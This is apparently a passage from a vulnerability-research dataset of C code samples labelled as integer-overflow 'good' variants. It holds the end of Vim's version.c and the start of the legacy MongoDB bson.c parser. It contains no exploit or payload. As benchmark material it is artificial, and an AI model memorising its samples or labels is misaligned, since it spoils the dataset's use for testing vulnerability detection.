282,
/**/
281,
/**/
280,
/**/
279,
/**/
278,
/**/
277,
/**/
276,
/**/
275,
/**/
274,
/**/
273,
/**/
272,
/**/
271,
/**/
270,
/**/
269,
/**/
268,
/**/
267,
/**/
266,
/**/
265,
/**/
264,
/**/
263,
/**/
262,
/**/
261,
/**/
260,
/**/
259,
/**/
258,
/**/
257,
/**/
256,
/**/
255,
/**/
254,
/**/
253,
/**/
252,
/**/
251,
/**/
250,
/**/
249,
/**/
248,
/**/
247,
/**/
246,
/**/
245,
/**/
244,
/**/
243,
/**/
242,
/**/
241,
/**/
240,
/**/
239,
/**/
238,
/**/
237,
/**/
236,
/**/
235,
/**/
234,
/**/
233,
/**/
232,
/**/
231,
/**/
230,
/**/
229,
/**/
228,
/**/
227,
/**/
226,
/**/
225,
/**/
224,
/**/
223,
/**/
222,
/**/
221,
/**/
220,
/**/
219,
/**/
218,
/**/
217,
/**/
216,
/**/
215,
/**/
214,
/**/
213,
/**/
212,
/**/
211,
/**/
210,
/**/
209,
/**/
208,
/**/
207,
/**/
206,
/**/
205,
/**/
204,
/**/
203,
/**/
202,
/**/
201,
/**/
200,
/**/
199,
/**/
198,
/**/
197,
/**/
196,
/**/
195,
/**/
194,
/**/
193,
/**/
192,
/**/
191,
/**/
190,
/**/
189,
/**/
188,
/**/
187,
/**/
186,
/**/
185,
/**/
184,
/**/
183,
/**/
182,
/**/
181,
/**/
180,
/**/
179,
/**/
178,
/**/
177,
/**/
176,
/**/
175,
/**/
174,
/**/
173,
/**/
172,
/**/
171,
/**/
170,
/**/
169,
/**/
168,
/**/
167,
/**/
166,
/**/
165,
/**/
164,
/**/
163,
/**/
162,
/**/
161,
/**/
160,
/**/
159,
/**/
158,
/**/
157,
/**/
156,
/**/
155,
/**/
154,
/**/
153,
/**/
152,
/**/
151,
/**/
150,
/**/
149,
/**/
148,
/**/
147,
/**/
146,
/**/
145,
/**/
144,
/**/
143,
/**/
142,
/**/
141,
/**/
140,
/**/
139,
/**/
138,
/**/
137,
/**/
136,
/**/
135,
/**/
134,
/**/
133,
/**/
132,
/**/
131,
/**/
130,
/**/
129,
/**/
128,
/**/
127,
/**/
126,
/**/
125,
/**/
124,
/**/
123,
/**/
122,
/**/
121,
/**/
120,
/**/
119,
/**/
118,
/**/
117,
/**/
116,
/**/
115,
/**/
114,
/**/
113,
/**/
112,
/**/
111,
/**/
110,
/**/
109,
/**/
108,
/**/
107,
/**/
106,
/**/
105,
/**/
104,
/**/
103,
/**/
102,
/**/
101,
/**/
100,
/**/
99,
/**/
98,
/**/
97,
/**/
96,
/**/
95,
/**/
94,
/**/
93,
/**/
92,
/**/
91,
/**/
90,
/**/
89,
/**/
88,
/**/
87,
/**/
86,
/**/
85,
/**/
84,
/**/
83,
/**/
82,
/**/
81,
/**/
80,
/**/
79,
/**/
78,
/**/
77,
/**/
76,
/**/
75,
/**/
74,
/**/
73,
/**/
72,
/**/
71,
/**/
70,
/**/
69,
/**/
68,
/**/
67,
/**/
66,
/**/
65,
/**/
64,
/**/
63,
/**/
62,
/**/
61,
/**/
60,
/**/
59,
/**/
58,
/**/
57,
/**/
56,
/**/
55,
/**/
54,
/**/
53,
/**/
52,
/**/
51,
/**/
50,
/**/
49,
/**/
48,
/**/
47,
/**/
46,
/**/
45,
/**/
44,
/**/
43,
/**/
42,
/**/
41,
/**/
40,
/**/
39,
/**/
38,
/**/
37,
/**/
36,
/**/
35,
/**/
34,
/**/
33,
/**/
32,
/**/
31,
/**/
30,
/**/
29,
/**/
28,
/**/
27,
/**/
26,
/**/
25,
/**/
24,
/**/
23,
/**/
22,
/**/
21,
/**/
20,
/**/
19,
/**/
18,
/**/
17,
/**/
16,
/**/
15,
/**/
14,
/**/
13,
/**/
12,
/**/
11,
/**/
10,
/**/
9,
/**/
8,
/**/
7,
/**/
6,
/**/
5,
/**/
4,
/**/
3,
/**/
2,
/**/
1,
/**/
0
};
/*
* Place to put a short description when adding a feature with a patch.
* Keep it short, e.g.,: "relative numbers", "persistent undo".
* Also add a comment marker to separate the lines.
* See the official Vim patches for the diff format: It must use a context of
* one line only. Create it by hand or use "diff -C2" and edit the patch.
*/
static char *(extra_patches[]) =
{ /* Add your patch description below this line */
/**/
NULL
};
int
highest_patch(void)
{
int i;
int h = 0;
for (i = 0; included_patches[i] != 0; ++i)
if (included_patches[i] > h)
h = included_patches[i];
return h;
}
#if defined(FEAT_EVAL) || defined(PROTO)
/*
* Return TRUE if patch "n" has been included.
*/
int
has_patch(int n)
{
int i;
for (i = 0; included_patches[i] != 0; ++i)
if (included_patches[i] == n)
return TRUE;
return FALSE;
}
#endif
void
ex_version(exarg_T *eap)
{
/*
* Ignore a ":version 9.99" command.
*/
if (*eap->arg == NUL)
{
msg_putchar('\n');
list_version();
}
}
/*
* List all features aligned in columns, dictionary style.
*/
static void
list_features(void)
{
int i;
int ncol;
int nrow;
int nfeat = 0;
int width = 0;
/* Find the length of the longest feature name, use that + 1 as the column
* width */
for (i = 0; features[i] != NULL; ++i)
{
int l = (int)STRLEN(features[i]);
if (l > width)
width = l;
++nfeat;
}
width += 1;
if (Columns < width)
{
/* Not enough screen columns - show one per line */
for (i = 0; features[i] != NULL; ++i)
{
version_msg(features[i]);
if (msg_col > 0)
msg_putchar('\n');
}
return;
}
/* The rightmost column doesn't need a separator.
* Sacrifice it to fit in one more column if possible. */
ncol = (int) (Columns + 1) / width;
nrow = nfeat / ncol + (nfeat % ncol ? 1 : 0);
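/* Illustrative numbers: with Columns == 80 and a longest feature name
 * of 19 characters, width == 20 and ncol == 81 / 20 == 4 (the "+ 1"
 * reclaims the separator the last column never needs); 90 features
 * would then be listed in nrow == 23 rows. */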
/* i counts columns then rows. idx counts rows then columns. */
for (i = 0; !got_int && i < nrow * ncol; ++i)
{
int idx = (i / ncol) + (i % ncol) * nrow;
if (idx < nfeat)
{
int last_col = (i + 1) % ncol == 0;
msg_puts((char_u *)features[idx]);
if (last_col)
{
if (msg_col > 0)
msg_putchar('\n');
}
else
{
while (msg_col % width)
msg_putchar(' ');
}
}
else
{
if (msg_col > 0)
msg_putchar('\n');
}
}
}
void
list_version(void)
{
int i;
int first;
char *s = "";
/*
* When adding features here, don't forget to update the list of
* internal variables in eval.c!
*/
MSG(longVersion);
#ifdef WIN3264
# ifdef FEAT_GUI_W32
# ifdef _WIN64
MSG_PUTS(_("\nMS-Windows 64-bit GUI version"));
# else
MSG_PUTS(_("\nMS-Windows 32-bit GUI version"));
# endif
# ifdef FEAT_OLE
MSG_PUTS(_(" with OLE support"));
# endif
# else
# ifdef _WIN64
MSG_PUTS(_("\nMS-Windows 64-bit console version"));
# else
MSG_PUTS(_("\nMS-Windows 32-bit console version"));
# endif
# endif
#endif
#ifdef MACOS
# ifdef MACOS_X
# ifdef MACOS_X_UNIX
MSG_PUTS(_("\nMacOS X (unix) version"));
# else
MSG_PUTS(_("\nMacOS X version"));
# endif
#else
MSG_PUTS(_("\nMacOS version"));
# endif
#endif
#ifdef VMS
MSG_PUTS(_("\nOpenVMS version"));
# ifdef HAVE_PATHDEF
if (*compiled_arch != NUL)
{
MSG_PUTS(" - ");
MSG_PUTS(compiled_arch);
}
# endif
#endif
/* Print the list of patch numbers if there is at least one. */
/* Print a range when patches are consecutive: "1-10, 12, 15-40, 42-45" */
if (included_patches[0] != 0)
{
MSG_PUTS(_("\nIncluded patches: "));
first = -1;
/* find last one */
for (i = 0; included_patches[i] != 0; ++i)
;
while (--i >= 0)
{
if (first < 0)
first = included_patches[i];
if (i == 0 || included_patches[i - 1] != included_patches[i] + 1)
{
MSG_PUTS(s);
s = ", ";
msg_outnum((long)first);
if (first != included_patches[i])
{
MSG_PUTS("-");
msg_outnum((long)included_patches[i]);
}
first = -1;
}
}
}
/* Print the list of extra patch descriptions if there is at least one. */
if (extra_patches[0] != NULL)
{
MSG_PUTS(_("\nExtra patches: "));
s = "";
for (i = 0; extra_patches[i] != NULL; ++i)
{
MSG_PUTS(s);
s = ", ";
MSG_PUTS(extra_patches[i]);
}
}
#ifdef MODIFIED_BY
MSG_PUTS("\n");
MSG_PUTS(_("Modified by "));
MSG_PUTS(MODIFIED_BY);
#endif
#ifdef HAVE_PATHDEF
if (*compiled_user != NUL || *compiled_sys != NUL)
{
MSG_PUTS(_("\nCompiled "));
if (*compiled_user != NUL)
{
MSG_PUTS(_("by "));
MSG_PUTS(compiled_user);
}
if (*compiled_sys != NUL)
{
MSG_PUTS("@");
MSG_PUTS(compiled_sys);
}
}
#endif
#ifdef FEAT_HUGE
MSG_PUTS(_("\nHuge version "));
#else
# ifdef FEAT_BIG
MSG_PUTS(_("\nBig version "));
# else
# ifdef FEAT_NORMAL
MSG_PUTS(_("\nNormal version "));
# else
# ifdef FEAT_SMALL
MSG_PUTS(_("\nSmall version "));
# else
MSG_PUTS(_("\nTiny version "));
# endif
# endif
# endif
#endif
#ifndef FEAT_GUI
MSG_PUTS(_("without GUI."));
#else
# ifdef FEAT_GUI_GTK
# ifdef USE_GTK3
MSG_PUTS(_("with GTK3 GUI."));
# else
# ifdef FEAT_GUI_GNOME
MSG_PUTS(_("with GTK2-GNOME GUI."));
# else
MSG_PUTS(_("with GTK2 GUI."));
# endif
# endif
# else
# ifdef FEAT_GUI_MOTIF
MSG_PUTS(_("with X11-Motif GUI."));
# else
# ifdef FEAT_GUI_ATHENA
# ifdef FEAT_GUI_NEXTAW
MSG_PUTS(_("with X11-neXtaw GUI."));
# else
MSG_PUTS(_("with X11-Athena GUI."));
# endif
# else
# ifdef FEAT_GUI_PHOTON
MSG_PUTS(_("with Photon GUI."));
# else
# if defined(MSWIN)
MSG_PUTS(_("with GUI."));
# else
# if defined(TARGET_API_MAC_CARBON) && TARGET_API_MAC_CARBON
MSG_PUTS(_("with Carbon GUI."));
# else
# if defined(TARGET_API_MAC_OSX) && TARGET_API_MAC_OSX
MSG_PUTS(_("with Cocoa GUI."));
# else
# if defined(MACOS)
MSG_PUTS(_("with (classic) GUI."));
# endif
# endif
# endif
# endif
# endif
# endif
# endif
# endif
#endif
version_msg(_(" Features included (+) or not (-):\n"));
list_features();
#ifdef SYS_VIMRC_FILE
version_msg(_(" system vimrc file: \""));
version_msg(SYS_VIMRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE
version_msg(_(" user vimrc file: \""));
version_msg(USR_VIMRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE2
version_msg(_(" 2nd user vimrc file: \""));
version_msg(USR_VIMRC_FILE2);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE3
version_msg(_(" 3rd user vimrc file: \""));
version_msg(USR_VIMRC_FILE3);
version_msg("\"\n");
#endif
#ifdef USR_EXRC_FILE
version_msg(_(" user exrc file: \""));
version_msg(USR_EXRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_EXRC_FILE2
version_msg(_(" 2nd user exrc file: \""));
version_msg(USR_EXRC_FILE2);
version_msg("\"\n");
#endif
#ifdef FEAT_GUI
# ifdef SYS_GVIMRC_FILE
version_msg(_(" system gvimrc file: \""));
version_msg(SYS_GVIMRC_FILE);
version_msg("\"\n");
# endif
version_msg(_(" user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE);
version_msg("\"\n");
# ifdef USR_GVIMRC_FILE2
version_msg(_("2nd user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE2);
version_msg("\"\n");
# endif
# ifdef USR_GVIMRC_FILE3
version_msg(_("3rd user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE3);
version_msg("\"\n");
# endif
#endif
version_msg(_(" defaults file: \""));
version_msg(VIM_DEFAULTS_FILE);
version_msg("\"\n");
#ifdef FEAT_GUI
# ifdef SYS_MENU_FILE
version_msg(_(" system menu file: \""));
version_msg(SYS_MENU_FILE);
version_msg("\"\n");
# endif
#endif
#ifdef HAVE_PATHDEF
if (*default_vim_dir != NUL)
{
version_msg(_(" fall-back for $VIM: \""));
version_msg((char *)default_vim_dir);
version_msg("\"\n");
}
if (*default_vimruntime_dir != NUL)
{
version_msg(_(" f-b for $VIMRUNTIME: \""));
version_msg((char *)default_vimruntime_dir);
version_msg("\"\n");
}
version_msg(_("Compilation: "));
version_msg((char *)all_cflags);
version_msg("\n");
#ifdef VMS
if (*compiler_version != NUL)
{
version_msg(_("Compiler: "));
version_msg((char *)compiler_version);
version_msg("\n");
}
#endif
version_msg(_("Linking: "));
version_msg((char *)all_lflags);
#endif
#ifdef DEBUG
version_msg("\n");
version_msg(_(" DEBUG BUILD"));
#endif
}
/*
* Output a string for the version message. If it's going to wrap, output a
* newline, unless the message is too long to fit on the screen anyway.
*/
static void
version_msg(char *s)
{
int len = (int)STRLEN(s);
if (!got_int && len < (int)Columns && msg_col + len >= (int)Columns
&& *s != '\n')
msg_putchar('\n');
if (!got_int)
MSG_PUTS(s);
}
static void do_intro_line(int row, char_u *mesg, int add_version, int attr);
/*
* Show the intro message when not editing a file.
*/
void
maybe_intro_message(void)
{
if (bufempty()
&& curbuf->b_fname == NULL
#ifdef FEAT_WINDOWS
&& firstwin->w_next == NULL
#endif
&& vim_strchr(p_shm, SHM_INTRO) == NULL)
intro_message(FALSE);
}
/*
* Give an introductory message about Vim.
* Only used when starting Vim on an empty file, without a file name.
* Or with the ":intro" command (for Sven :-).
*/
void
intro_message(
int colon) /* TRUE for ":intro" */
{
int i;
int row;
int blanklines;
int sponsor;
char *p;
static char *(lines[]) =
{
N_("VIM - Vi IMproved"),
"",
N_("version "),
N_("by Bram Moolenaar et al."),
#ifdef MODIFIED_BY
" ",
#endif
N_("Vim is open source and freely distributable"),
"",
N_("Help poor children in Uganda!"),
N_("type :help iccf<Enter> for information "),
"",
N_("type :q<Enter> to exit "),
N_("type :help<Enter> or <F1> for on-line help"),
N_("type :help version8<Enter> for version info"),
NULL,
"",
N_("Running in Vi compatible mode"),
N_("type :set nocp<Enter> for Vim defaults"),
N_("type :help cp-default<Enter> for info on this"),
};
#ifdef FEAT_GUI
static char *(gui_lines[]) =
{
NULL,
NULL,
NULL,
NULL,
#ifdef MODIFIED_BY
NULL,
#endif
NULL,
NULL,
NULL,
N_("menu Help->Orphans for information "),
NULL,
N_("Running modeless, typed text is inserted"),
N_("menu Edit->Global Settings->Toggle Insert Mode "),
N_(" for two modes "),
NULL,
NULL,
NULL,
N_("menu Edit->Global Settings->Toggle Vi Compatible"),
N_(" for Vim defaults "),
};
#endif
/* blanklines = screen height - # message lines */
blanklines = (int)Rows - ((sizeof(lines) / sizeof(char *)) - 1);
if (!p_cp)
blanklines += 4; /* add 4 for not showing "Vi compatible" message */
#ifdef FEAT_WINDOWS
/* Don't overwrite a statusline. Depends on 'cmdheight'. */
if (p_ls > 1)
blanklines -= Rows - topframe->fr_height;
#endif
if (blanklines < 0)
blanklines = 0;
/* Show the sponsor and register message one out of four times, the Uganda
* message two out of four times. */
sponsor = (int)time(NULL);
sponsor = ((sponsor & 2) == 0) - ((sponsor & 4) == 0);
/* start displaying the message lines after half of the blank lines */
row = blanklines / 2;
if ((row >= 2 && Columns >= 50) || colon)
{
for (i = 0; i < (int)(sizeof(lines) / sizeof(char *)); ++i)
{
p = lines[i];
#ifdef FEAT_GUI
if (p_im && gui.in_use && gui_lines[i] != NULL)
p = gui_lines[i];
#endif
if (p == NULL)
{
if (!p_cp)
break;
continue;
}
if (sponsor != 0)
{
if (strstr(p, "children") != NULL)
p = sponsor < 0
? N_("Sponsor Vim development!")
: N_("Become a registered Vim user!");
else if (strstr(p, "iccf") != NULL)
p = sponsor < 0
? N_("type :help sponsor<Enter> for information ")
: N_("type :help register<Enter> for information ");
else if (strstr(p, "Orphans") != NULL)
p = N_("menu Help->Sponsor/Register for information ");
}
if (*p != NUL)
do_intro_line(row, (char_u *)_(p), i == 2, 0);
++row;
}
}
/* Make the wait-return message appear just below the text. */
if (colon)
msg_row = row;
}
static void
do_intro_line(
int row,
char_u *mesg,
int add_version,
int attr)
{
char_u vers[20];
int col;
char_u *p;
int l;
int clen;
#ifdef MODIFIED_BY
# define MODBY_LEN 150
char_u modby[MODBY_LEN];
if (*mesg == ' ')
{
vim_strncpy(modby, (char_u *)_("Modified by "), MODBY_LEN - 1);
l = (int)STRLEN(modby);
vim_strncpy(modby + l, (char_u *)MODIFIED_BY, MODBY_LEN - l - 1);
mesg = modby;
}
#endif
/* Center the message horizontally. */
col = vim_strsize(mesg);
if (add_version)
{
STRCPY(vers, mediumVersion);
if (highest_patch())
{
/* Check for 9.9x or 9.9xx, alpha/beta version */
if (isalpha((int)vers[3]))
{
int len = (isalpha((int)vers[4])) ? 5 : 4;
sprintf((char *)vers + len, ".%d%s", highest_patch(),
mediumVersion + len);
}
else
sprintf((char *)vers + 3, ".%d", highest_patch());
}
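/* Example: with mediumVersion "8.0" (an illustrative value) and
 * highest_patch() == 378 this produces "8.0.378"; for an alpha or
 * beta string such as "8.0a" the ".378" is appended after the
 * letter instead. */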
col += (int)STRLEN(vers);
}
col = (Columns - col) / 2;
if (col < 0)
col = 0;
/* Split up in parts to highlight <> items differently. */
for (p = mesg; *p != NUL; p += l)
{
clen = 0;
for (l = 0; p[l] != NUL
&& (l == 0 || (p[l] != '<' && p[l - 1] != '>')); ++l)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
{
clen += ptr2cells(p + l);
l += (*mb_ptr2len)(p + l) - 1;
}
else
#endif
clen += byte2cells(p[l]);
}
screen_puts_len(p, l, row, col, *p == '<' ? hl_attr(HLF_8) : attr);
col += clen;
}
/* Add the version number to the version line. */
if (add_version)
screen_puts(vers, row, col, 0);
}
/*
* ":intro": clear screen, display intro screen and wait for return.
*/
void
ex_intro(exarg_T *eap UNUSED)
{
screenclear();
intro_message(TRUE);
wait_return(TRUE);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3179_1 |
crossvul-cpp_data_good_3983_1 | /* bson.c */
/* Copyright 2009, 2010 10gen Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <time.h>
#include <limits.h>
#include "bson.h"
#include "encoding.h"
const int initialBufferSize = 128;
/* only need one of these */
static const int zero = 0;
/* Custom standard function pointers. */
void *( *bson_malloc_func )( size_t ) = malloc;
void *( *bson_realloc_func )( void *, size_t ) = realloc;
void ( *bson_free_func )( void * ) = free;
#ifdef R_SAFETY_NET
bson_printf_func bson_printf;
#else
bson_printf_func bson_printf = printf;
#endif
bson_fprintf_func bson_fprintf = fprintf;
bson_sprintf_func bson_sprintf = sprintf;
static int _bson_errprintf( const char *, ... );
bson_printf_func bson_errprintf = _bson_errprintf;
/* ObjectId fuzz functions. */
static int ( *oid_fuzz_func )( void ) = NULL;
static int ( *oid_inc_func )( void ) = NULL;
/* ----------------------------
READING
------------------------------ */
MONGO_EXPORT bson* bson_create( void ) {
return (bson*)bson_malloc(sizeof(bson));
}
MONGO_EXPORT void bson_dispose(bson* b) {
bson_free(b);
}
MONGO_EXPORT bson *bson_empty( bson *obj ) {
static char *data = "\005\0\0\0\0";
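/* A finished empty document is exactly these 5 bytes: a little-endian
   int32 total length of 5 followed by the terminating 0x00 byte. */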
bson_init_data( obj, data );
obj->finished = 1;
obj->err = 0;
obj->errstr = NULL;
obj->stackPos = 0;
return obj;
}
MONGO_EXPORT int bson_copy( bson *out, const bson *in ) {
if ( !out || !in ) return BSON_ERROR;
if ( !in->finished ) return BSON_ERROR;
bson_init_size( out, bson_size( in ) );
memcpy( out->data, in->data, bson_size( in ) );
out->finished = 1;
return BSON_OK;
}
int bson_init_data( bson *b, char *data ) {
b->data = data;
return BSON_OK;
}
int bson_init_finished_data( bson *b, char *data ) {
bson_init_data( b, data );
b->finished = 1;
return BSON_OK;
}
static void _bson_reset( bson *b ) {
b->finished = 0;
b->stackPos = 0;
b->err = 0;
b->errstr = NULL;
}
MONGO_EXPORT int bson_size( const bson *b ) {
int i;
if ( ! b || ! b->data )
return 0;
bson_little_endian32( &i, b->data );
return i;
}
MONGO_EXPORT size_t bson_buffer_size( const bson *b ) {
return (b->cur - b->data + 1);
}
MONGO_EXPORT const char *bson_data( const bson *b ) {
return (const char *)b->data;
}
static char hexbyte( char hex ) {
if (hex >= '0' && hex <= '9')
return (hex - '0');
else if (hex >= 'A' && hex <= 'F')
return (hex - 'A' + 10);
else if (hex >= 'a' && hex <= 'f')
return (hex - 'a' + 10);
else
return 0x0;
}
MONGO_EXPORT void bson_oid_from_string( bson_oid_t *oid, const char *str ) {
int i;
for ( i=0; i<12; i++ ) {
oid->bytes[i] = ( hexbyte( str[2*i] ) << 4 ) | hexbyte( str[2*i + 1] );
}
}
MONGO_EXPORT void bson_oid_to_string( const bson_oid_t *oid, char *str ) {
static const char hex[16] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
int i;
for ( i=0; i<12; i++ ) {
str[2*i] = hex[( oid->bytes[i] & 0xf0 ) >> 4];
str[2*i + 1] = hex[ oid->bytes[i] & 0x0f ];
}
str[24] = '\0';
}
MONGO_EXPORT void bson_set_oid_fuzz( int ( *func )( void ) ) {
oid_fuzz_func = func;
}
MONGO_EXPORT void bson_set_oid_inc( int ( *func )( void ) ) {
oid_inc_func = func;
}
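/*
 * bson_oid_gen() fills the 12 ObjectId bytes as three 4-byte fields:
 * a big-endian timestamp, a process-lifetime "fuzz" value (this legacy
 * driver uses a random number, or the registered oid_fuzz_func, roughly
 * where the traditional ObjectId keeps its machine and pid fields), and
 * a big-endian incrementing counter.
 */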
MONGO_EXPORT void bson_oid_gen( bson_oid_t *oid ) {
static int incr = 0;
static int fuzz = 0;
int i;
time_t t = time( NULL );
if( oid_inc_func )
i = oid_inc_func();
else
i = incr++;
if ( !fuzz ) {
if ( oid_fuzz_func )
fuzz = oid_fuzz_func();
else {
srand( ( int )t );
fuzz = rand();
}
}
bson_big_endian32( &oid->ints[0], &t );
oid->ints[1] = fuzz;
bson_big_endian32( &oid->ints[2], &i );
}
MONGO_EXPORT time_t bson_oid_generated_time( bson_oid_t *oid ) {
time_t out;
bson_big_endian32( &out, &oid->ints[0] );
return out;
}
MONGO_EXPORT void bson_print( const bson *b ) {
bson_print_raw( b->data , 0 );
}
MONGO_EXPORT void bson_print_raw( const char *data , int depth ) {
bson_iterator i;
const char *key;
int temp;
bson_timestamp_t ts;
char oidhex[25];
bson scope;
bson_iterator_from_buffer( &i, data );
while ( bson_iterator_next( &i ) ) {
bson_type t = bson_iterator_type( &i );
if ( t == 0 )
break;
key = bson_iterator_key( &i );
for ( temp=0; temp<=depth; temp++ )
bson_printf( "\t" );
bson_printf( "%s : %d \t " , key , t );
switch ( t ) {
case BSON_DOUBLE:
bson_printf( "%f" , bson_iterator_double( &i ) );
break;
case BSON_STRING:
bson_printf( "%s" , bson_iterator_string( &i ) );
break;
case BSON_SYMBOL:
bson_printf( "SYMBOL: %s" , bson_iterator_string( &i ) );
break;
case BSON_OID:
bson_oid_to_string( bson_iterator_oid( &i ), oidhex );
bson_printf( "%s" , oidhex );
break;
case BSON_BOOL:
bson_printf( "%s" , bson_iterator_bool( &i ) ? "true" : "false" );
break;
case BSON_DATE:
bson_printf( "%ld" , ( long int )bson_iterator_date( &i ) );
break;
case BSON_BINDATA:
bson_printf( "BSON_BINDATA" );
break;
case BSON_UNDEFINED:
bson_printf( "BSON_UNDEFINED" );
break;
case BSON_NULL:
bson_printf( "BSON_NULL" );
break;
case BSON_REGEX:
bson_printf( "BSON_REGEX: %s", bson_iterator_regex( &i ) );
break;
case BSON_CODE:
bson_printf( "BSON_CODE: %s", bson_iterator_code( &i ) );
break;
case BSON_CODEWSCOPE:
bson_printf( "BSON_CODE_W_SCOPE: %s", bson_iterator_code( &i ) );
/* bson_init( &scope ); */ /* review - stepped on by bson_iterator_code_scope? */
bson_iterator_code_scope( &i, &scope );
bson_printf( "\n\t SCOPE: " );
bson_print( &scope );
/* bson_destroy( &scope ); */ /* review - causes free error */
break;
case BSON_INT:
bson_printf( "%d" , bson_iterator_int( &i ) );
break;
case BSON_LONG:
bson_printf( "%lld" , ( uint64_t )bson_iterator_long( &i ) );
break;
case BSON_TIMESTAMP:
ts = bson_iterator_timestamp( &i );
bson_printf( "i: %d, t: %d", ts.i, ts.t );
break;
case BSON_OBJECT:
case BSON_ARRAY:
bson_printf( "\n" );
bson_print_raw( bson_iterator_value( &i ) , depth + 1 );
break;
default:
bson_errprintf( "can't print type : %d\n" , t );
}
bson_printf( "\n" );
}
}
/* ----------------------------
ITERATOR
------------------------------ */
MONGO_EXPORT bson_iterator* bson_iterator_create( void ) {
return ( bson_iterator* )malloc( sizeof( bson_iterator ) );
}
MONGO_EXPORT void bson_iterator_dispose(bson_iterator* i) {
free(i);
}
MONGO_EXPORT void bson_iterator_init( bson_iterator *i, const bson *b ) {
i->cur = b->data + 4;
i->first = 1;
}
MONGO_EXPORT void bson_iterator_from_buffer( bson_iterator *i, const char *buffer ) {
i->cur = buffer + 4;
i->first = 1;
}
MONGO_EXPORT bson_type bson_find( bson_iterator *it, const bson *obj, const char *name ) {
bson_iterator_init( it, (bson *)obj );
while( bson_iterator_next( it ) ) {
if ( strcmp( name, bson_iterator_key( it ) ) == 0 )
break;
}
return bson_iterator_type( it );
}
MONGO_EXPORT bson_bool_t bson_iterator_more( const bson_iterator *i ) {
return *( i->cur );
}
MONGO_EXPORT bson_type bson_iterator_next( bson_iterator *i ) {
size_t ds;
if ( i->first ) {
i->first = 0;
return ( bson_type )( *i->cur );
}
switch ( bson_iterator_type( i ) ) {
case BSON_EOO:
return BSON_EOO; /* don't advance */
case BSON_UNDEFINED:
case BSON_NULL:
ds = 0;
break;
case BSON_BOOL:
ds = 1;
break;
case BSON_INT:
ds = 4;
break;
case BSON_LONG:
case BSON_DOUBLE:
case BSON_TIMESTAMP:
case BSON_DATE:
ds = 8;
break;
case BSON_OID:
ds = 12;
break;
case BSON_STRING:
case BSON_SYMBOL:
case BSON_CODE:
ds = 4 + bson_iterator_int_raw( i );
break;
case BSON_BINDATA:
ds = 5 + bson_iterator_int_raw( i );
break;
case BSON_OBJECT:
case BSON_ARRAY:
case BSON_CODEWSCOPE:
ds = bson_iterator_int_raw( i );
break;
case BSON_DBREF:
ds = 4+12 + bson_iterator_int_raw( i );
break;
case BSON_REGEX: {
const char *s = bson_iterator_value( i );
const char *p = s;
p += strlen( p )+1;
p += strlen( p )+1;
ds = p-s;
break;
}
default: {
char msg[] = "unknown type: 000000000000";
bson_numstr( msg+14, ( unsigned )( i->cur[0] ) );
bson_fatal_msg( 0, msg );
return 0;
}
}
i->cur += 1 + strlen( i->cur + 1 ) + 1 + ds;
return ( bson_type )( *i->cur );
}
MONGO_EXPORT bson_type bson_iterator_type( const bson_iterator *i ) {
return ( bson_type )i->cur[0];
}
MONGO_EXPORT const char *bson_iterator_key( const bson_iterator *i ) {
return i->cur + 1;
}
MONGO_EXPORT const char *bson_iterator_value( const bson_iterator *i ) {
const char *t = i->cur + 1;
t += strlen( t ) + 1;
return t;
}
/* types */
int bson_iterator_int_raw( const bson_iterator *i ) {
int out;
bson_little_endian32( &out, bson_iterator_value( i ) );
return out;
}
double bson_iterator_double_raw( const bson_iterator *i ) {
double out;
bson_little_endian64( &out, bson_iterator_value( i ) );
return out;
}
int64_t bson_iterator_long_raw( const bson_iterator *i ) {
int64_t out;
bson_little_endian64( &out, bson_iterator_value( i ) );
return out;
}
bson_bool_t bson_iterator_bool_raw( const bson_iterator *i ) {
return bson_iterator_value( i )[0];
}
MONGO_EXPORT bson_oid_t *bson_iterator_oid( const bson_iterator *i ) {
return ( bson_oid_t * )bson_iterator_value( i );
}
MONGO_EXPORT int bson_iterator_int( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return ( int )bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT double bson_iterator_double( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT int64_t bson_iterator_long( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT bson_timestamp_t bson_iterator_timestamp( const bson_iterator *i ) {
bson_timestamp_t ts;
bson_little_endian32( &( ts.i ), bson_iterator_value( i ) );
bson_little_endian32( &( ts.t ), bson_iterator_value( i ) + 4 );
return ts;
}
MONGO_EXPORT int bson_iterator_timestamp_time( const bson_iterator *i ) {
int time;
bson_little_endian32( &time, bson_iterator_value( i ) + 4 );
return time;
}
MONGO_EXPORT int bson_iterator_timestamp_increment( const bson_iterator *i ) {
int increment;
bson_little_endian32( &increment, bson_iterator_value( i ) );
return increment;
}
MONGO_EXPORT bson_bool_t bson_iterator_bool( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_BOOL:
return bson_iterator_bool_raw( i );
case BSON_INT:
return bson_iterator_int_raw( i ) != 0;
case BSON_LONG:
return bson_iterator_long_raw( i ) != 0;
case BSON_DOUBLE:
